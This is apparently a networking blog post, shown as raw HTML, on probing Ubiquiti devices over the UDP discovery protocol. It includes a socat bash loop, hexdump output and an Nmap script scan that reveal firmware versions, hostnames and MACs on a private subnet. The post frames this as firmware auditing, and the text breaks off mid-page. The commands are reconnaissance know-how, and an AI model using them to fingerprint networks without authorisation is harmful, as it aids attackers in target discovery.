<span style="color: #0086f7; font-weight: bold;">00000000</span> <span style="color: #0086f7; font-weight: bold;">01</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">a</span> <span style="color: #0086f7; font-weight: bold;">01</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">06</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: #0086f7; font-weight: bold;">02</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: white;">|...........nU...|</span>
<span style="color: #0086f7; font-weight: bold;">00000010</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: white;">c0</span> <span style="color: white;">a8</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: #0086f7; font-weight: bold;">32</span> <span style="color: #0086f7; font-weight: bold;">02</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">|....nU...</span><span style="color: #0086f7; font-weight: bold;">2.</span><span style="color: white;">.....|</span>
<span style="color: #0086f7; font-weight: bold;">00000020</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: white;">a9</span> <span style="color: white;">fe</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: #0086f7; font-weight: bold;">03</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">22</span> <span style="color: #0086f7; font-weight: bold;">57</span> <span style="color: #0086f7; font-weight: bold;">41</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">72</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: white;">|.nU..nU..</span><span style="color: #0086d2;">"WA.ar9|</span>
<span style="color: #0086f7; font-weight: bold;">00000030</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">78</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">76</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: white;">|</span><span style="color: #0086f7; font-weight: bold;">34</span><span style="color: white;">x.v8.</span><span style="color: #0086f7; font-weight: bold;">5.8</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">38845</span><span style="color: white;">|</span>
<span style="color: #0086f7; font-weight: bold;">00000040</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">30</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">30</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">36</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">04</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: white;">|.</span><span style="color: #0086f7; font-weight: bold;">180918.1016</span><span style="color: white;">....|</span>
<span style="color: #0086f7; font-weight: bold;">00000050</span> <span style="color: white;">af</span> <span style="color: #0086f7; font-weight: bold;">11</span> <span style="color: #0086f7; font-weight: bold;">86</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">b</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">06</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">66</span> <span style="color: #0086f7; font-weight: bold;">66</span> <span style="color: #0086f7; font-weight: bold;">69</span> <span style="color: #0086f7; font-weight: bold;">63</span> <span style="color: #0086f7; font-weight: bold;">65</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">03</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">e</span> <span style="color: white;">|......Office...N|</span>
<span style="color: #0086f7; font-weight: bold;">00000060</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">d</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">09</span> <span style="color: #0086f7; font-weight: bold;">64</span> <span style="color: #0086f7; font-weight: bold;">65</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">74</span> <span style="color: #0086f7; font-weight: bold;">68</span> <span style="color: #0086f7; font-weight: bold;">32</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: white;">|</span><span style="color: #0086f7; font-weight: bold;">5L</span><span style="color: white;">...death2all..|</span>
<span style="color: #0086f7; font-weight: bold;">00000070</span> <span style="color: #0086f7; font-weight: bold;">01</span> <span style="color: #0086f7; font-weight: bold;">03</span> <span style="color: #0086f7; font-weight: bold;">10</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">02</span> <span style="color: white;">e7</span> <span style="color: white;">fa</span> <span style="color: #0086f7; font-weight: bold;">13</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">06</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: white;">|..............nU|</span>
<span style="color: #0086f7; font-weight: bold;">00000080</span> <span style="color: #0086f7; font-weight: bold;">14</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">14</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">53</span> <span style="color: #0086f7; font-weight: bold;">74</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">74</span> <span style="color: #0086f7; font-weight: bold;">69</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">20</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: white;">|...NanoStation</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">|</span>
<span style="color: #0086f7; font-weight: bold;">00000090</span> <span style="color: #0086f7; font-weight: bold;">41</span> <span style="color: #0086f7; font-weight: bold;">43</span> <span style="color: #0086f7; font-weight: bold;">20</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">63</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">18</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">04</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: white;">|AC</span> <span style="color: white;">loco.......|</span>
<span style="color: #0086f7; font-weight: bold;">0000009</span><span style="color: white;">e</span>
<span style="color: white;">------</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.51</span> <span style="color: white;">------</span>
<span style="color: #0086f7; font-weight: bold;">00000000</span> <span style="color: #0086f7; font-weight: bold;">01</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">b</span> <span style="color: #0086f7; font-weight: bold;">01</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">06</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">77</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">b</span> <span style="color: #0086f7; font-weight: bold;">02</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: white;">|...........w....|</span>
<span style="color: #0086f7; font-weight: bold;">00000010</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">77</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">b</span> <span style="color: white;">c0</span> <span style="color: white;">a8</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">02</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">|....w....</span><span style="color: #0086f7; font-weight: bold;">3.</span><span style="color: white;">.....|</span>
<span style="color: #0086f7; font-weight: bold;">00000020</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">77</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">b</span> <span style="color: white;">a9</span> <span style="color: white;">fe</span> <span style="color: #0086f7; font-weight: bold;">77</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">b</span> <span style="color: #0086f7; font-weight: bold;">03</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">23</span> <span style="color: #0086f7; font-weight: bold;">57</span> <span style="color: #0086f7; font-weight: bold;">41</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">72</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: white;">|.w...w...</span><span style="background-color: #0f140f; color: #008800; font-style: italic;">#WA.ar9|</span>
<span style="color: #0086f7; font-weight: bold;">00000030</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">78</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">76</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: white;">|</span><span style="color: #0086f7; font-weight: bold;">34</span><span style="color: white;">x.v8.</span><span style="color: #0086f7; font-weight: bold;">5.11</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">3984</span><span style="color: white;">|</span>
<span style="color: #0086f7; font-weight: bold;">00000040</span> <span style="color: #0086f7; font-weight: bold;">32</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: #0086f7; font-weight: bold;">30</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">30</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">a</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">04</span> <span style="color: white;">|</span><span style="color: #0086f7; font-weight: bold;">2.190109</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">1449.</span><span style="color: white;">..|</span>
<span style="color: #0086f7; font-weight: bold;">00000050</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">08</span> <span style="color: #0086f7; font-weight: bold;">29</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">b</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">06</span> <span style="color: #0086f7; font-weight: bold;">47</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">72</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">67</span> <span style="color: #0086f7; font-weight: bold;">65</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">03</span> <span style="color: white;">|...)...Garage...|</span>
<span style="color: #0086f7; font-weight: bold;">00000060</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">d</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">09</span> <span style="color: #0086f7; font-weight: bold;">64</span> <span style="color: #0086f7; font-weight: bold;">65</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">74</span> <span style="color: #0086f7; font-weight: bold;">68</span> <span style="color: #0086f7; font-weight: bold;">32</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">e</span> <span style="color: white;">|N5L...death2all.|</span>
<span style="color: #0086f7; font-weight: bold;">00000070</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">01</span> <span style="color: #0086f7; font-weight: bold;">02</span> <span style="color: #0086f7; font-weight: bold;">10</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">02</span> <span style="color: white;">e7</span> <span style="color: white;">fa</span> <span style="color: #0086f7; font-weight: bold;">13</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">06</span> <span style="color: white;">fc</span> <span style="color: white;">ec</span> <span style="color: white;">da</span> <span style="color: white;">c4</span> <span style="color: #0086f7; font-weight: bold;">77</span> <span style="color: white;">|...............w|</span>
<span style="color: #0086f7; font-weight: bold;">00000080</span> <span style="color: #0086f7; font-weight: bold;">0</span><span style="color: white;">b</span> <span style="color: #0086f7; font-weight: bold;">14</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">14</span> <span style="color: #0086f7; font-weight: bold;">4</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">53</span> <span style="color: #0086f7; font-weight: bold;">74</span> <span style="color: #0086f7; font-weight: bold;">61</span> <span style="color: #0086f7; font-weight: bold;">74</span> <span style="color: #0086f7; font-weight: bold;">69</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">20</span> <span style="color: white;">|....NanoStation</span> <span style="color: white;">|</span>
<span style="color: #0086f7; font-weight: bold;">00000090</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">41</span> <span style="color: #0086f7; font-weight: bold;">43</span> <span style="color: #0086f7; font-weight: bold;">20</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">c</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">63</span> <span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">f</span> <span style="color: #0086f7; font-weight: bold;">18</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">04</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: #0086f7; font-weight: bold;">00</span> <span style="color: white;">|</span><span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">AC</span> <span style="color: white;">loco.......|</span>
<span style="color: #0086f7; font-weight: bold;">0000009</span><span style="color: white;">f</span>
</pre>
</div>
<br />
<h4>
Look for outdated or mismatched firmware</h4>
I find this useful on customer networks. It lets me quickly check for outdated or mismatched firmware versions.<br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: white;">ip</span> <span style="color: white;">in</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.</span><span style="color: white;">{</span><span style="color: #0086f7; font-weight: bold;">50.</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">51</span><span style="color: white;">}</span>
<span style="color: white;">do</span>
<span style="color: white;">echo</span> <span style="color: #0086d2;">"------ ${ip} ------"</span>
<span style="color: white;">echo</span> <span style="color: white;">-ne</span> <span style="color: #0086d2;">"\x01\x00\x00\x00"</span> <span style="color: white;">|</span> <span style="color: white;">socat</span> <span style="color: white;">-t</span> <span style="color: #0086f7; font-weight: bold;">1</span> <span style="color: white;">udp:$ip:</span><span style="color: #0086f7; font-weight: bold;">10001</span> <span style="color: white;">-</span> <span style="color: white;">|</span> <span style="color: white;">hexdump</span> <span style="color: white;">-C</span> <span style="color: white;">|</span> <span style="color: white;">grep</span> <span style="color: white;">v</span>
<span style="color: white;">done</span>
<span style="color: white;">------</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.50</span> <span style="color: white;">------</span>
<span style="color: #0086f7; font-weight: bold;">00000030</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">78</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">76</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: white;">|</span><span style="color: #0086f7; font-weight: bold;">34</span><span style="color: white;">x.v8.</span><span style="color: #0086f7; font-weight: bold;">5.8</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">38845</span><span style="color: white;">|</span>
<span style="color: white;">------</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.51</span> <span style="color: white;">------</span>
<span style="color: #0086f7; font-weight: bold;">00000030</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: #0086f7; font-weight: bold;">78</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">76</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">31</span> <span style="color: #0086f7; font-weight: bold;">2</span><span style="color: white;">e</span> <span style="color: #0086f7; font-weight: bold;">33</span> <span style="color: #0086f7; font-weight: bold;">39</span> <span style="color: #0086f7; font-weight: bold;">38</span> <span style="color: #0086f7; font-weight: bold;">34</span> <span style="color: white;">|</span><span style="color: #0086f7; font-weight: bold;">34</span><span style="color: white;">x.v8.</span><span style="color: #0086f7; font-weight: bold;">5.11</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">3984</span><span style="color: white;">|</span>
</pre>
</div>
<br />
Nmap<br />
There is an Nmap script for Ubiquiti Discovery - ubiquiti-discovery.nse. It pulls down more information than the bash script and will work on Windows. The home page for the script is <a href="https://nmap.org/nsedoc/scripts/ubiquiti-discovery.html">here</a>.<br />
<br />
You will need to download two files from the nmap repository:<br />
<div>
<a href="https://svn.nmap.org/nmap/nselib/tableaux.lua">tableaux.lua</a></div>
<div>
<a href="https://svn.nmap.org/nmap/scripts/ubiquiti-discovery.nse">ubiquiti-discovery.nse</a></div>
<div>
<br /></div>
<div>
On Windows</div>
<div>
<div>
Save tableaux.lua to c:\Program Files (x86)\nselib</div>
<div>
Save ubiquiti-discovery.nse to c:\Program Files (x86)\scripts</div>
</div>
<div>
<br /></div>
<div>
On Linux, as root</div>
<div>
<div>
Save tableaux.lua to /usr/share/nmap/nselib</div>
<div>
Save ubiquiti-discovery.nse to /usr/share/nmap/scripts</div>
<!-- HTML generated using hilite.me --><br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: white;">sudo</span> <span style="color: white;">nmap</span> <span style="color: white;">-sU</span> <span style="color: white;">-p</span> <span style="color: #0086f7; font-weight: bold;">10001</span> <span style="color: white;">--script</span> <span style="color: #0086d2;">ubiquiti-discovery.nse</span> <span style="color: white;">-oG</span> <span style="color: white;">ubnt</span> <span style="color: #0086f7; font-weight: bold;">192.168.10.50</span>
<span style="color: white;">Starting</span> <span style="color: white;">Nmap</span> <span style="color: #0086d2;">7.60</span> <span style="color: white;">(</span> <span style="color: white;">https:</span><span style="color: #0086d2;">//nmap.org</span> <span style="color: white;">)</span> <span style="color: white;">at</span> <span style="color: #0086f7; font-weight: bold;">2019</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">02</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">10</span> <span style="color: #0086f7; font-weight: bold;">22</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">16</span> <span style="color: white;">PST</span>
<span style="color: white;">Nmap</span> <span style="color: white;">scan</span> <span style="color: white;">report</span> <span style="color: #fb660a; font-weight: bold;">for</span> <span style="color: #0086f7; font-weight: bold;">192.168.10.50</span>
<span style="color: white;">Host</span> <span style="color: white;">is</span> <span style="color: white;">up</span> <span style="color: white;">(</span><span style="color: #0086d2;">0.0027s</span> <span style="color: white;">latency).</span>
<span style="color: white;">PORT</span> <span style="color: white;">STATE</span> <span style="color: white;">SERVICE</span>
<span style="color: #0086f7; font-weight: bold;">10001/udp</span> <span style="color: white;">open</span> <span style="color: white;">ubiquiti-discovery</span>
<span style="color: white;">|</span> <span style="color: white;">ubiquiti-discovery:</span>
<span style="color: white;">|</span> <span style="color: white;">protocol:</span> <span style="color: white;">v1</span>
<span style="color: white;">|</span> <span style="color: white;">firmware:</span> <span style="color: #0086d2;">WA.ar934x.v8.5.11.39842.190109.1449</span>
<span style="color: white;">|</span> <span style="color: white;">version:</span> <span style="color: #0086d2;">v8.5.11</span>
<span style="color: white;">|</span> <span style="color: white;">uptime_seconds:</span> <span style="color: #0086f7; font-weight: bold;">196320</span>
<span style="color: white;">|</span> <span style="color: white;">uptime:</span> <span style="color: white;">2 days</span> <span style="color: #0086f7; font-weight: bold;">06</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">32</span><span style="color: white;">:</span><span style="color: #0086f7; font-weight: bold;">00</span>
<span style="color: white;">|</span> <span style="color: white;">hostname:</span> <span style="color: white;">Office</span>
<span style="color: white;">|</span> <span style="color: white;">product:</span> <span style="color: white;">N5L</span>
<span style="color: white;">|</span> <span style="color: white;">essid:</span> <span style="color: white;">death2all</span>
<span style="color: white;">|</span> <span style="color: white;">model:</span> <span style="color: white;">NanoStation</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">AC</span> <span style="color: white;">loco</span>
<span style="color: white;">|</span> <span style="color: white;">interface_to_ip:</span>
<span style="color: white;">|</span> <span style="color: white;">fc:ec:da:c4:</span><span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e:</span><span style="color: #0086f7; font-weight: bold;">55</span><span style="color: white;">:</span>
<span style="color: white;">|</span> <span style="color: #0086f7; font-weight: bold;">192.168.10.50</span>
<span style="color: white;">|</span> <span style="color: #0086f7; font-weight: bold;">169.254.110.85</span>
<span style="color: white;">|</span> <span style="color: white;">mac_addresses:</span>
<span style="color: white;">|_</span> <span style="color: white;">fc:ec:da:c4:</span><span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">e:</span><span style="color: #0086f7; font-weight: bold;">55</span>
<span style="color: white;">MAC</span> <span style="color: white;">Address:</span> <span style="color: white;">FC:EC:DA:C4:</span><span style="color: #0086f7; font-weight: bold;">6</span><span style="color: white;">E:</span><span style="color: #0086f7; font-weight: bold;">55</span> <span style="color: white;">(Ubiquiti</span> <span style="color: white;">Networks)</span>
<span style="color: white;">Service</span> <span style="color: white;">Info:</span> <span style="color: white;">OS:</span> <span style="color: white;">Linux</span>
<span style="color: white;">Nmap</span> <span style="color: white;">done:</span> <span style="color: #0086f7; font-weight: bold;">1</span> <span style="color: white;">IP</span> <span style="color: white;">address</span> <span style="color: white;">(</span><span style="color: #0086f7; font-weight: bold;">1</span> <span style="color: white;">host</span> <span style="color: white;">up)</span> <span style="color: white;">scanned</span> <span style="color: white;">in</span> <span style="color: #0086d2;">0.68</span> <span style="color: white;">seconds</span>
</pre>
</div>
<br />
On Linux, If you want to compare the firmware of more than one device:<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
